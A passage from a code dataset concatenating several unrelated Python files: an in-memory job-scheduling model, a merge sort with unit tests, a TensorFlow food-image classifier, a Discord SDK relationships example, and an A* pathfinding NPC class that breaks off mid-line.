CompareError(\"%s.%s.%s=%s\" % (obj,\n my if my else ref_type.__name__,\n attribute, mfv),\n \"%s.%s.%s=%s\" % (obj,\n other if other else ref_type.__name__,\n attribute, ofv))\n o = other_state\n if should_have_same_incarnation and \\\n (o.incarnation != self.incarnation):\n raise CompareError(\"incarnation=%d\" % self.incarnation,\n \"incarnation=%d\" % o.incarnation)\n my_pools = set(self.pools.keys())\n other_pools = set(o.pools.keys())\n if my_pools != other_pools:\n raise CompareError(\"pools=%s\" % my_pools,\n \"pools=%s\" % other_pools)\n my_nodes = set(self.all_nodes.by_name.keys())\n other_nodes = set(o.all_nodes.by_name.keys())\n if my_nodes != other_nodes:\n raise CompareError(\"nodes=%s\" % my_nodes,\n \"nodes=%s\" % other_nodes)\n my_jobs = set(self.jobs.jobs_by_id.keys())\n other_jobs = set(o.jobs.jobs_by_id.keys())\n if my_jobs != other_jobs:\n raise CompareError(\"jobs=%s\" % my_jobs,\n \"jobs=%s\" % other_jobs)\n # check the details of the nodes\n for node in self.all_nodes.by_name.values():\n check_inc(self, node)\n other_node = o.all_nodes.by_name[node.name]\n check_inc(o, other_node)\n if node.pool:\n if not other_node.pool:\n raise CompareError(\"pool=%s\" % node.pool.name,\n \"pool=None\")\n if other_node.pool.name != node.pool.name:\n raise CompareError(\"pool=%s\" % node.pool.name,\n \"pool=%s\" % other_node.pool.name)\n elif other_node.pool:\n raise CompareError(\"pool=None\",\n \"pool=%s\" % other_node.pool.name)\n if node.job:\n compare_fields(node, model.Job, node.job, other_node.job, \"job_id\")\n compare_fields(node, model.Task, node.task, other_node.task, \"task_id\")\n else:\n if node.task:\n raise Exception(\"Node %s task field is set when no job\" % node.name)\n if other_node.task:\n raise Exception(\"Other ode %s task field is set when no job\" % other_node.name)\n \n # check the details of the pools\n for pool in self.pools.values():\n check_inc(self, pool)\n other_pool = o.pools[pool.name]\n check_inc(o, other_pool)\n if pool.available_set != other_pool.available_set:\n raise CompareError(\"pool.available_set=%s\" % pool.available_set,\n \"pool.available_set=%s\" % other_pool.available_set)\n p_nodes = set(pool.nodes_by_name.keys())\n op_nodes = set(other_pool.nodes_by_name.keys())\n if p_nodes != op_nodes:\n raise CompareError(\"pool.nodes_by_name=%s\" % p_nodes,\n \"pool.nodes_by_name=%s\" % op_nodes)\n # check the details of the jobs\n for job in self.jobs.jobs_by_id.values():\n check_inc(self, job)\n other_job = o.jobs.jobs_by_id[job.job_id]\n check_inc(o, other_job)\n compare_fields(job, model.NodePool, job.node_pool, other_job.node_pool, \"name\")\n j_nodes = set([node.name for node in job.current_nodes])\n o_nodes = set([node.name for node in other_job.current_nodes])\n if j_nodes != o_nodes:\n raise CompareError(\"job.current_nodes=%s\" % j_nodes,\n \"job.current_nodes=%s\" % o_nodes)\n # check the details of the tasks\n if len(job.tasks)!=len(other_job.tasks):\n raise CompareError(\"len(job.tasks)=%d\" % len(job.tasks),\n \"len(job.tasks)=%d\" % len(other_job.tasks))\n for i in range(len(job.tasks)):\n task = job.tasks[i]\n check_inc(self, task)\n if task.job!=job:\n raise CompareError(\"State.compare(): task %d does not point to job %s\" %\n (i, job.job_id))\n other_task = other_job.tasks[i]\n check_inc(o, other_task)\n if other_task.job!=other_job:\n raise CompareError(\"State.compare(): task %d does not point to job %s\" %\n (i, other_job.job_id))\n if task.name!=other_task.name:\n raise CompareError(\"task.name=%s\" % task.name,\n \"task.name=%s\" % other_task.name)\n if task.node_name!=other_task.node_name:\n raise CompareError(\"task.node_name=%s\" % task.node_name,\n \"task.node_name=%s\" % other_task.node_name)\n\n \n \n \n@apply_interface_contracts(model.Node)\nclass Node(model.Node):\n def __init__(self, model, name, os_username, worker_port, is_temporary,\n hostname=None, public_ip=None, private_ip=None, pool=None):\n self.model = model\n self.name = name\n self.os_username = os_username\n self.worker_port = worker_port\n self._is_temporary = is_temporary\n self.hostname = hostname\n self.public_ip = public_ip\n self.private_ip = private_ip\n self.pool = pool\n self.job = None\n self.locked = False\n self.incarnation = self.model._get_incarnation()\n self.task = None\n\n def get_name(self): return self.name\n\n def get_hostname(self): return self.hostname\n\n def get_public_ip(self): return self.public_ip\n\n def get_private_ip(self): return self.private_ip\n\n def get_os_username(self): return self.os_username\n\n def get_worker_port(self): return self.worker_port\n \n def is_temporary(self):\n return self._is_temporary\n\n def get_pool(self):\n return self.pool\n\n def get_job(self): return self.job\n\n def _set_job(self, job):\n assert self.job==None\n check_inc(self, job)\n self.job = job\n\n def _clear_job(self):\n assert self.job\n self.job = None\n\n def get_task(self): return self.task\n\n def _set_task(self, task):\n assert self.task==None\n self.task = task\n\n def _clear_task(self):\n assert self.task\n self.task = None\n \n def lock(self):\n if not self.locked:\n self.model._lock_object(self)\n\n def __repr__(self):\n return \"Node(%s)\" % self.name\n\n \n@apply_interface_contracts(model.StaticNodePool) \nclass StaticNodePool(model.StaticNodePool):\n def __init__(self, model, name):\n self.model = model\n self.name = name\n self.available_set = set()\n self.nodes_by_name = {}\n self.locked = False\n self.incarnation = model._get_incarnation()\n\n def get_name(self): return self.name\n\n def get_current_size(self): return len(self.nodes_by_name)\n\n def get_current_available_size(self): return len(self.available_set)\n\n def _get_model_adapter(self): return self.model\n\n def lock(self):\n self.model._lock_object(self)\n\n def get_all_nodes_in_pool(self):\n return self.nodes_by_name.values()\n\n def _choose_one_available_node(self, job):\n if len(self.available_set)==0:\n raise NodesNotAvailable(\"StaticNodePoool._choose_one_available_node() called when no nodes are available in pool\")\n node_name = self.available_set.pop()\n node = self.nodes_by_name[node_name]\n node._set_job(job)\n return node\n \n def _take_node_from_available_set(self, node, job):\n assert node.name in self.available_set\n assert node.job == None\n self.available_set.remove(node.name)\n node._set_job(job)\n\n def _release_node(self, node, job):\n assert node.job == job\n assert not (node.name in self.available_set)\n check_inc(self, node)\n check_inc(self, job)\n node._clear_job()\n self.available_set.add(node.name)\n\n def __repr__(self):\n return \"StaticNodePool(%s)\" % self.name\n\n\n@apply_interface_contracts(model.Job)\nclass Job(model.Job):\n def __init__(self, incarnation, job_id, name, job_type, description,\n coordinator_lockfile,\n node_pool=None):\n self.incarnation = incarnation\n self.job_id = job_id\n self.name = name\n self.job_type = job_type\n self.description = description\n self.coordinator_lockfile = coordinator_lockfile\n self.current_nodes = []\n self.tasks = []\n self.task_names = set() # just used as a sanity check on completed tasks\n self.node_pool = node_pool\n self.completion_status = None\n self.completion_comment = None\n self.num_active_tasks = 0\n\n def get_id(self): return self.job_id\n \n def get_name(self): return self.name\n\n def get_job_type(self): return self.job_type\n\n def get_description(self): return self.description\n\n def get_coordinator_lockfile(self): return self.coordinator_lockfile\n\n def get_current_nodes(self):\n return copy.copy(self.current_nodes)\n\n def get_node_by_name(self, node_name):\n for node in self.current_nodes:\n if node.name==node_name:\n return node\n return None\n \n def get_task_by_id(self, task_id):\n task_idx = task_id - 1\n if task_idx<0 or task_idx>len(self.tasks):\n raise ModelError(\"Invalid task id for job %s: %d\" %\n (self.name, task_id))\n return self.tasks[task_idx]\n \n def get_node_pool(self): return self.node_pool\n\n def _associate_node_with_job(self, node):\n check_inc(self, node)\n for n in self.current_nodes:\n if n==node:\n raise Exception(\"Attempting to add node %s to job multiple times\" %\n node.name)\n self.current_nodes.append(node)\n\n def _disassociate_node_from_job(self, node):\n check_inc(self, node)\n for i in range(len(self.current_nodes)):\n if node==self.current_nodes[i]:\n del self.current_nodes[i]\n return\n raise Exception(\"Node %s not associated with job %s\" %\n (node.name, self.name))\n\n def get_status(self):\n return self.completion_status\n\n def _stop_job(self, job_status, comment=None):\n assert self.completion_status==None\n self.completion_status = job_status\n self.completion_comment = comment\n self.coordinator_lockfile = None\n\n def _add_task(self, task):\n self.tasks.append(task)\n self.task_names.add(task.name)\n self.num_active_tasks += 1\n\n def _task_has_completed(self, task):\n assert task.name in self.task_names, \\\n \"task %s not in %s\" % (task.name, self.task_names)\n self.num_active_tasks -= 1\n\n def get_num_active_tasks(self):\n return self.num_active_tasks\n\n def get_all_tasks(self):\n return [task for task in self.tasks]\n\n def __repr__(self):\n return \"Job(%s)\" % self.job_id\n\n\n@apply_interface_contracts(model.Task)\nclass Task(model.Task):\n def __init__(self, model, task_id, name, job, task_type, node_name,\n description):\n self.incarnation = model._get_incarnation()\n self.task_id = task_id\n self.name = name\n self.job = job\n self.task_type = task_type\n self.node_name = node_name\n self.description = description\n self.result_status = None\n\n def get_id(self): return self.task_id\n \n def get_name(self): return self.name\n\n def get_task_type(self): return self.task_type\n\n def get_job(self): return self.job\n\n def get_description(self): return self.description\n\n def get_node_name(self): return self.node_name\n\n def _set_result_status(self, result_status):\n assert self.result_status==None\n self.result_status = result_status\n\n def get_result_status(self):\n return self.result_status\n\n def __repr__(self):\n return \"Task(%s, %d)\" % (self.job.job_id, self.task_id)\n\n\n@apply_interface_contracts(model.ModelAdapterBase)\nclass ModelAdapter(model.ModelAdapterBase):\n def __init__(self, config_path):\n self.state = None\n self.prev_state = State()\n self.db_created = False\n self.incarnation_hwm = 0 # incarnation high water mark\n\n def create_database(self):\n assert not self.db_created\n self.db_created = True\n \n def create_static_pool(self, pool_name):\n assert not self.state.pools.has_key(pool_name)\n pool = StaticNodePool(self, pool_name)\n self.state.pools[pool_name] = pool\n return pool\n\n def delete_static_pool(self, pool):\n assert len(pool.nodes_by_name)==0\n assert self.state.pools.has_key(pool.name)\n del self.state.pools[pool.name]\n\n def query_pools(self, pool_name=None):\n if pool_name:\n if self.state.pools.has_key(pool_name):\n return [self.state.pools[pool_name],]\n else:\n return []\n else:\n return [pool for pool in self.state.pools.values()]\n \n def find_node(self, name=None, hostname=None, public_ip=None,\n private_ip=None):\n return self.state.all_nodes.find_node(name=name, hostname=hostname,\n public_ip=public_ip,\n private_ip=private_ip)\n\n def query_nodes(self, pool_name=None, job_id=None):\n if pool_name and job_id:\n raise ModelError(\"Cannot specify both pool_name and job_id in query_nodes()\")\n if pool_name:\n if not self.state.pools.has_key(pool_name):\n raise ModelError(\"Pool %s does not exist\" % pool_name)\n pool = self.state.pools[pool_name]\n return [node for node in pool.get_all_nodes_in_pool()]\n elif job_id:\n if not self.state.jobs.has_job(job_id):\n raise ModelError(\"Job id %s does not exist\" % job_id)\n job = self.state.jobs.jobs_by_id[job_id]\n return job.get_current_nodes()\n else:\n return [node for node in self.state.all_nodes.get_all_nodes()]\n \n def create_node(self, os_username, worker_port, is_temporary,\n name=None, hostname=None, public_ip=None,\n private_ip=None,\n pool=None):\n if (not hostname) and (not public_ip) and (not private_ip):\n raise Exception(\"Need to specify one of hostname, public_ip or private_ip\") \n if not name:\n if hostname:\n name = hostname\n elif public_ip:\n name = public_ip\n elif private_ip:\n name = private_ip\n else:\n assert 0\n node = Node(self, name, os_username, worker_port, is_temporary,\n hostname, public_ip, private_ip, pool)\n self.state.all_nodes.add_node(node)\n if pool:\n pool.nodes_by_name[name] = node\n pool.available_set.add(name)\n return node\n\n def _check_inc(self, obj):\n if obj.incarnation!=self._get_incarnation():\n msg = \"Atempt to reference a stale object from an aborted transaction. %s of type %s has incarnation %d, while the model has incarnation %d\" %\\\n (obj, type(obj), obj.incarnation, self._get_incarnation())\n raise StaleRefError(msg)\n \n def delete_node(self, node):\n assert node.job==None\n self._check_inc(node)\n if node.pool:\n del node.pool.nodes_by_name[node.name]\n if node.name in node.pool.available_set:\n node.pool.available_set.remove(node.name)\n self.state.all_nodes.remove_node(node)\n \n def create_job(self, name, job_type, description,\n coordinator_lockfile, node_pool=None):\n job_id = self.state.jobs.get_id_for_job(name)\n if node_pool:\n self._check_inc(node_pool)\n job = Job(self._get_incarnation(), job_id,\n name, job_type, description,\n coordinator_lockfile,\n node_pool=node_pool)\n self.state.jobs.add_job(job)\n return job\n\n def delete_job(self, job):\n assert self.state.jobs.has_job(job.job_id)\n self.state.jobs.delete_job(job)\n\n def query_jobs(self, job_id=None, job_name=None, pool_name=None):\n return self.state.jobs.query_jobs(job_id=job_id, job_name=job_name,\n pool_name=pool_name)\n\n def create_task(self, name, job, task_type, node, description):\n assert self.is_in_transaction()\n self._check_inc(job)\n self._check_inc(node)\n node.lock()\n assert node.job == job\n task_id = len(job.tasks) + 1\n task = Task(self, task_id, name, job, task_type, node.name, description)\n node._set_task(task)\n job._add_task(task)\n return task\n \n def _lock_object(self, obj):\n assert self.is_in_transaction()\n self._check_inc(obj)\n self.state.lock_object(obj)\n\n def begin_transaction(self):\n assert self.prev_state!=None\n assert self.state==None\n self.state = self.prev_state\n assert not self.state.has_locked_objects()\n self.state.inc_incarnation(self)\n self.prev_state = self.state.copy(self)\n\n def commit_transaction(self):\n assert self.is_in_transaction()\n self.state.unlock_all()\n self.prev_state = self.state\n self.state = None\n \n def abort_transaction(self):\n \"\"\" Go back to the previous state.\n \"\"\"\n assert self.is_in_transaction()\n self.state = None\n self.prev_state.inc_incarnation(self)\n \n def is_in_transaction(self):\n return self.state!=None\n\n def _get_incarnation(self):\n return self.state.incarnation\n\n def _check_obj_valid(self, obj):\n self._check_inc(obj)\n","sub_path":"dist_job_mgr/mem_model.py","file_name":"mem_model.py","file_ext":"py","file_size_in_byte":27012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"257198878","text":"import unittest # @UnresolvedImport\n\ndef merge(inList1, inList2):\n \"\"\"\n \"\"\"\n result = []\n add_to_result = result.append\n i,j = 0,0\n while True:\n if i < len(inList1) and j < len(inList2):\n if inList1[i] < inList2[j]:\n add_to_result(inList1[i])\n i+=1\n else:\n add_to_result(inList2[j])\n j+=1\n elif i < len(inList1):\n for k in xrange(i,len(inList1)): add_to_result(inList1[k])\n break\n else:\n for k in xrange(j,len(inList2)): add_to_result(inList1[k])\n break\n return result\n\ndef merge_sort(in_list):\n if len(in_list) <= 1: return in_list\n mid = len(in_list)//2\n return merge(merge_sort(in_list[:mid]),merge_sort(in_list[mid:]))\n\n\nclass MergeSortTest(unittest.TestCase):\n def test_triviallyOkLen(self):\n test_input = [4,3,2,1]\n expected = [1,2,3,4]\n actual = merge_sort(test_input)\n self.failUnlessEqual(expected,actual)\n \n def test_triviallyOk(self):\n test_input = [4]\n expected = [4]\n actual = merge_sort(test_input)\n self.failUnlessEqual(expected,actual)\n\nif __name__ == \"__main__\":\n unittest.main() \n \n \n \n ","sub_path":"pythonTest/src/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"385299425","text":"import tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport numpy as np\n#import cv2 as cv\nimport random\nimport csv\nimport time\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras import layers, datasets, models\nfrom sklearn.metrics import confusion_matrix\nimport pandas as pd\nfrom sklearn.utils import class_weight \n\n#获取图片,存放到对应的列表中,同时贴上标签,存放到label列表中\ndef get_files(file_dir):\n '''\n image_list=[]\n label_list=[]\n for file in os.listdir(file_dir ):\n a = file_dir + '/' + file\n image_list.append(a)\n label = file[0]\n label_list.append(label)\n '''\n Bread = []\n label_Bread = []\n DairyProduct = []\n label_DairyProduct = []\n Dessert = []\n label_Dessert = []\n Egg = []\n label_Egg = []\n FriedFood = []\n label_FriedFood = []\n Meat = []\n label_Meat = []\n Noodles = []\n label_Noodles = []\n Rice = []\n label_Rice = []\n Seafood = []\n label_Seafood = []\n Soup = []\n label_Soup = []\n Vegetable = []\n label_Vegetable = []\n\n for file in os.listdir(file_dir + '/Bread'):\n Bread.append(file_dir + '/Bread' + '/' + file)\n label_Bread.append(0)\n\n for file in os.listdir(file_dir + '/DairyProduct'):\n DairyProduct.append(file_dir + '/DairyProduct' + '/' + file)\n label_DairyProduct.append(1)\n\n for file in os.listdir(file_dir + '/Dessert'):\n Dessert.append(file_dir + '/Dessert' + '/' + file)\n label_Dessert.append(2)\n\n for file in os.listdir(file_dir + '/Egg'):\n Egg.append(file_dir + '/Egg' + '/' + file)\n label_Egg.append(3)\n\n for file in os.listdir(file_dir + '/FriedFood'):\n FriedFood.append(file_dir + '/FriedFood' + '/' + file)\n label_FriedFood.append(4)\n\n for file in os.listdir(file_dir + '/Meat'):\n Meat.append(file_dir + '/Meat' + '/' + file)\n label_Meat.append(5)\n\n for file in os.listdir(file_dir + '/Noodles'):\n Noodles.append(file_dir + '/Noodles' + '/' + file)\n label_Noodles.append(6)\n\n for file in os.listdir(file_dir + '/Rice'):\n Rice.append(file_dir + '/Rice' + '/' + file)\n label_Rice.append(7)\n\n for file in os.listdir(file_dir + '/Seafood'):\n Seafood.append(file_dir + '/Seafood' + '/' + file)\n label_Seafood.append(8)\n\n for file in os.listdir(file_dir + '/Soup'):\n Soup.append(file_dir + '/Soup' + '/' + file)\n label_Soup.append(9)\n\n for file in os.listdir(file_dir + '/Vegetable'):\n Vegetable.append(file_dir + '/Vegetable' + '/' + file)\n label_Vegetable.append(10)\n \n # 合并数据\n image_list = np.hstack((Bread, DairyProduct, Dessert, Egg, FriedFood, Meat,Noodles,Rice,Seafood,Soup,Vegetable))\n label_list = np.hstack((label_Bread, label_DairyProduct, label_Dessert, label_Egg, label_FriedFood, label_Meat,label_Noodles,label_Rice,label_Seafood,label_Soup,label_Vegetable))\n #利用shuffle打乱数据\n\n temp = np.array([image_list, label_list])\n temp = temp.transpose() # 转置\n np.random.shuffle(temp)\n\n #将所有的image和label转换成list\n image_list = list(temp[:, 0])\n image_list = [i for i in image_list]\n label_list = list(temp[:, 1])\n label_list = [int((i)) for i in label_list]\n\n return image_list, label_list\n\ndef get_files1(file_dir):\n test = []\n for file in os.listdir(file_dir):\n test.append(file_dir + '/' + file)\n return test\n\ndef get_tensor(image_list, label_list=[]):\n ims = []\n for image in image_list:\n\t #读取路径下的图片\n\t x = tf.io.read_file(image)\n\t #将路径映射为照片,3通道\n\t x = tf.image.decode_jpeg(x, channels=3)\n\t #修改图像大小\n\t x = tf.image.resize(x,[32,32])\n\t #将图像压入列表中\n\t ims.append(x)\n #将列表转换成tensor类型\n img = tf.convert_to_tensor(ims)\n y = tf.convert_to_tensor(label_list)\n return img,y\n\ndef plot_learning_curves(history,epoch):\n '''将tra_accuracy和val—_accyracy绘图'''\n plt.plot(np.arange(1,epoch+1),history.history['accuracy'],label='tra_accuracy')\n plt.plot(np.arange(1,epoch+1),history.history['val_accuracy'],label='val_accuracy') #x轴次数随epoch更改\n plt.grid(True) #显示网格\n #plt.gca().set_ylim(0,1) #设置y轴范围\n plt.xlabel('epoch')\n plt.ylabel('accuracy')\n plt.legend() # 将样例显示出来\n plt.show()\n\n\ndef plot_confusion_matrix(cm, labels_name, title):\n '''绘制混淆矩阵'''\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] # 归一化\n plt.imshow(cm, interpolation='nearest') # 在特定的窗口上显示图像\n plt.title(title) # 图像标题\n plt.colorbar()\n num_local = np.array(range(len(labels_name))) \n plt.xticks(num_local, labels_name, rotation=90) # 将标签印在x轴坐标上\n plt.yticks(num_local, labels_name) # 将标签印在y轴坐标上\n plt.ylabel('True label') \n plt.xlabel('Predicted label')\n # 显示数据\n for i in range(len(cm)): #第几行\n for j in range(len(cm[i])): #第几列\n plt.text(i, j, round(cm[i][j],2),horizontalalignment=\"center\",color=\"white\" if cm[i, j] > 0.2 else \"black\",fontsize=5)\n plt.show()\n\nif __name__ == \"__main__\":\n\n labels_name = ['Bread', 'DairyProduct', 'Dessert', 'Egg', 'FriedFood', 'Meat','Noodles','Rice','Seafood','Soup','Vegetable']\n #训练图片的路径\n train_dir = 'training1'\n test_dir = 'testing'\n val_dir = 'validation1'\n AUTOTUNE = tf.data.experimental.AUTOTUNE\n\n #训练图片与标签\n image_list, label_list = get_files(train_dir)\n train_x, train_y = get_tensor(image_list, label_list=label_list)\n \n #验证图片与标签\n val_image_list,val_label_list = get_files(val_dir)\n val_x, val_y = get_tensor(val_image_list,label_list=val_label_list)\n \n # 测试集\n test_list = get_files1(test_dir)\n test,_ = get_tensor(test_list)\n \n #归一化\n train_x, val_x = train_x / 255.0, val_x / 255.0\n print('train_x shape:', train_x.shape, 'val_x shape:', val_x.shape)\n \n\n # 模型构造\n model = models.Sequential()\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(11, activation='softmax'))\n model.summary()\n\n # 编译\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n model.summary()\n \n #训练集和验证集训练\n epoch = 30\n #class_weights = class_weight.compute_class_weight('balanced',np.unique(label_list),label_list)\n #class_weight_dict = dict(enumerate(class_weights))\n history = model.fit(train_x, train_y, epochs=epoch,validation_data=(val_x,val_y)) #epoch可更改\n model.evaluate(val_x,val_y)\n\n #绘制准确率图\n plot_learning_curves(history,epoch)\n \n #绘制混淆矩阵图\n y_pred = []\n y_pred1 = model.predict(val_x)\n y_pred2 = list(y_pred1)\n for x in y_pred2:\n y_pred.append(np.argmax(x))\n y_true = val_label_list\n cm = confusion_matrix(y_true,y_pred)\n plot_confusion_matrix(cm, labels_name, \"HAR Confusion Matrix\")\n \n \n\n\n #测试集预测\n predict = model.predict(test)\n pre = list(predict)\n\n x_max = []\n for x in pre:\n x_max.append(np.argmax(x))\n result = {'result':x_max}\n df = pd.DataFrame(result)\n df.to_csv(\"test_result.csv\")\n \n\n\n","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"205109710","text":"import random\nimport time\n\nimport discordsdk as dsdk\n\n\n# we get the application id from a file\nwith open(\"application_id.txt\", \"r\") as file:\n application_id = int(file.read())\n\n# we create the discord instance\napp = dsdk.Discord(application_id, dsdk.CreateFlags.default)\nrelationship_manager = app.get_relationship_manager()\n\n\n# events\ndef on_refresh():\n print(\"[on_refresh]\")\n\n # we filter friends\n relationship_manager.filter(\n lambda relationship: relationship.type == dsdk.RelationshipType.friend\n )\n\n # we get how many friends we have!!\n friend_count = relationship_manager.count()\n friends = []\n print(f\"You have {friend_count} friends!\")\n\n for n in range(friend_count):\n # we get the friend at index n\n friend = relationship_manager.get_at(n)\n\n # we add it to the list\n friends.append(friend)\n\n # we show it\n print(f\"{friend.user.username}#{friend.user.discriminator}\")\n\n if len(friends):\n print()\n\n # we get the friend with a random friend, by his ID\n random_friend = random.choice(friends)\n print(f\"Fetching {random_friend.user.id}\")\n\n friend = relationship_manager.get(random_friend.user.id)\n print(f\"We found {friend.user.username}.\")\n\n # let's get implicit relationships\n relationship_manager.filter(\n lambda relationship: relationship.type == dsdk.RelationshipType.implicit\n )\n\n print()\n print(\"Implicit relationships:\")\n for n in range(relationship_manager.count()):\n relationship = relationship_manager.get_at(n)\n print(f\" {relationship.user.username}#{relationship.user.discriminator}\")\n\n\ndef on_relationship_update(relationship):\n print(\"[on_relationship_update]\")\n print(f\"Relationship {relationship.user.username}\")\n\n\n# bind events\nrelationship_manager.on_refresh = on_refresh\nrelationship_manager.on_relationship_update = on_relationship_update\n\nwhile 1:\n time.sleep(1/10)\n app.run_callbacks()\n","sub_path":"examples/relationship.py","file_name":"relationship.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"86660529","text":"from Actor import *\nimport math, time, sys\n\n# Need to implement collision avoidance\n\n# This is the class that will be used by the NPCs\nclass NPC(Actor):\n\tdef __init__(self, offset_x, offset_y, actor_type, collision_type, patrol_route, game_map):\n\t\t# Don't forget to call the parent class!\n\t\tActor.__init__(self, offset_x, offset_y, actor_type, collision_type)\n\n\t\t# Route set for the NPC\n\t\tself.route = patrol_route\n\n\t\t# indexes for the lists\n\t\tself.route_index = 0\n\t\tself.astar_index = 0\n\n\t\t# Tile location of self\n\t\tself.tile_location = (self.rect.x/TILESIZE, self.rect.y/TILESIZE)\n\n\t\t#Tile math stuff\n\t\tself.next_tile = (0,0)\n\n\t\t# To keep track of whether the NPC is moving\n\t\tself.moving = False\n\n\t\t# slowing down the speed for patrol\n\t\tself.speed = 2\n\t\tself.change_timer = 8\n\n\t\t# Current state of the NPC\n\t\tself.state = None\n\n\t\t# The map of the game (used to check for objects on tiles)\n\t\tself.game_map = game_map\n\n\t\t# Check to see if path is done and index is set\n\t\tself.set = False\n\t\tself.set_index = False\n\n\t# AI pathfinding algorithm can be improved\n\tdef run_state(self, state, player):\n\t\tself.state = state\n\t\tif self.state == PATROL_STATE:\n\t\t\tself.patrol()\n\n# A* with errors\n\tdef set_path(self, destination):\n\t\tself.tile_location = self.get_tile_location()\n\t\t# Set of nodes already evaluated\n\t\tself.closed_set = []\n\t\t# Set of currently discovered nodes, not evaluated yet\n\t\tself.open_set = [self.tile_location]\n\t\t# Contain the most efficient previous steps\n\t\tself.came_from = {}\n\t\t# cost from going from start to node\n\t\tself.g_score = {}\n\t\tfor i in range (0, MAPHEIGHT):\n\t\t\tfor j in range (0, MAPWIDTH):\n\t\t\t\tself.g_score[(j,i)] = sys.maxint\n\t\tself.g_score[self.tile_location] = 0\n\t\t# total current cost from getting start to finish\n\t\tself.f_score = {\n\t\t\tself.tile_location : math.hypot(destination[0]-self.tile_location[0], destination[1]-self.tile_location[1])\n\t\t}\n\t\twhile len(self.open_set) != 0:\n\t\t\tcurrent_tile = (0,0)\n\t\t\tcurrent_value = MAPWIDTH*MAPHEIGHT\n\t\t\tfor node in self.open_set:\n\t\t\t\tif self.f_score[node] < current_value:\n\t\t\t\t\tcurrent_value = self.f_score[node]\n\t\t\t\t\tcurrent_tile = node\n\n\t\t\tif current_tile == destination:\n\t\t\t\tself.reconstruct_path(current_tile)\n\t\t\t\treturn\n\n\t\t\tself.open_set.remove(current_tile)\n\t\t\tself.closed_set.append(current_tile)\n\n\t\t\tself.explore_neighbors(current_tile, destination)\n\n\tdef reconstruct_path(self, current_tile):\n\t\tself.total_path = [current_tile]\n\t\tfor key, value in self.came_from.iteritems():\n\t\t\tif current_tile not in self.came_from:\n\t\t\t\tbreak\n\t\t\tcurrent_tile = self.came_from[current_tile]\n\t\t\tself.total_path.append(current_tile)\n\t\tself.total_path.remove(current_tile)\n\n\n\tdef explore_neighbors(self, current_tile, destination):\n\t\tneighbors = []\n\t\t# left_tile\n\t\tneighbors.append((current_tile[0]-1, current_tile[1]))\n\t\t# right_tile\n\t\tneighbors.append((current_tile[0]+1, current_tile[1]))\n\t\t# above_tile\n\t\tneighbors.append((current_tile[0], current_tile[1]-1))\n\t\t# below_tile\n\t\tneighbors.append((current_tile[0], current_tile[1]+1))\n\n\t\t# check every neighbor\n\t\tfor neighbor in neighbors:\n\t\t\tif neighbor in self.closed_set:\n\t\t\t\tcontinue\n\n\t\t\tif neighbor not in self.open_set:\n\t\t\t\t# If there is not an object there\n\t\t\t\tif self.game_map.tile_has_object(neighbor) == False:\n\t\t\t\t\tself.open_set.append(neighbor)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\t\t# distance from start to neighbor\n\t\t\tg_dist = math.hypot(current_tile[0]-neighbor[0], current_tile[1]-neighbor[1])\n\t\t\ttentative_g_score = self.g_score[current_tile] + g_dist\n\n\t\t\tif tentative_g_score >= self.g_score[neighbor]:\n\t\t\t\tcontinue # Not a good path to take\n\n\t\t\t# Possibly a good path, so map\n\t\t\tself.came_from[neighbor] = current_tile\n\t\t\tself.g_score[neighbor] = tentative_g_score\n\n\t\t\th_score = math.hypot(destination[0] - neighbor[0], destination[1]-neighbor[1])\n\t\t\tself.f_score[neighbor] = self.g_score[neighbor] + h_score\n\n\n\t# Movement using tiles\n\tdef move_to_location(self, location):\n\t\tif (self.direction == LEFT or self.direction == NA):\n\t\t\tif (self.rect.x + self.rect.width)/TILESIZE > location[0]:\n\t\t\t\tself.update(True, LEFT)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\t\tif (self.direction==RIGHT or self.direction==NA):\n\t\t\tif self.rect.x/TILESIZE < location[0]:\n\t\t\t\tself.update(True, RIGHT)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\t\tif (self.direction == UP or self.direction == NA):\n\t\t\tif (self.rect.y + self.rect.height)/TILESIZE > location[1]:\n\t\t\t\tself.update(True, UP)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\t\tif (self.direction == DOWN or self.direction == NA):\n\t\t\tif self.rect.y/TILESIZE < location[1]:\n\t\t\t\tself.update(True, DOWN)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tself.direction = NA\n\n\tdef patrol(self):\n\t\t# If nothing in route, then return\n\t\tif len(self.route) <= 0:\n\t\t\treturn\n\n\t\t# Speed the NPC is moving\n\t\tself.speed = 2\n\t\tself.change_timer = 8\n\n\t\t# Consists of elements in the route list\n\t\tdestination = (self.route[self.route_index][0]/TILESIZE, self.route[self.route_index][1]/TILESIZE)\n\n\t\t# If no path is set, then set a path\n\t\tif self.set == False:\n\t\t\tself.set = True\n\t\t\tself.set_path(destination)\n\n\t\t# Getting the next tile to move to\n\t\troute_len = len(self.total_path)\n\t\tif self.set_index == False:\n\t\t\tself.astar_index = route_len - 1\n\t\t\tself.set_index = True\n\t\tlocation = self.total_path[self.astar_index]\n\t\tif self.rect.x/TILESIZE != location[0] or self.rect.y/TILESIZE != location[1]:\n\t\t\tself.moving = 